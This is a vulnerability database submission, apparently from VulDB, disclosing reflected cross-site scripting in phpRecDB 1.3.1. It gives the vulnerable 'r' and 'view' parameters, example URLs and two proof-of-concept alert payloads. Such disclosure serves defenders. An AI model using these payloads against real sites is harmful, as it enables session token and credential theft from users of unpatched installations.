| 제목 | phpRecDB 1.3.1 - Reflected XSS |
|---|
| 설명 | # Exploit Title: phpRecDB 1.3.1 - Reflected XSS
# Exploit Author: skalvin aka (CraCkEr)
# Date: 30/07/2023
# Vendor: phprecdb.com
# Vendor Homepage: http://www.phprecdb.com/
# Software Link: http://www.phprecdb.com/demo/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /index.php
GET parameter 'r' is vulnerable to XSS
http://website/index.php?ajax=yw0&r=site%2fpage[XSS]&sort=Artist&view=news
XSS Payload: ov8mn<img src=a onerror=alert(1)>expro
Path: /index.php
GET parameter 'view' is vulnerable to XSS
http://www.website/index.php?ajax=yw0&r=site%2Fpage&sort=Artist&view=news[XSS]
XSS Payload: p96xr<script>alert(1)</script>axjwn
[-] Done |
|---|
| 사용자 | skalvin (UID 49463) |
|---|
| 제출 | 2023. 07. 30. AM 12:38 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 08. 15. PM 12:09 (16 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 237194 [phpRecDB 1.3.1 /index.php r/view 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|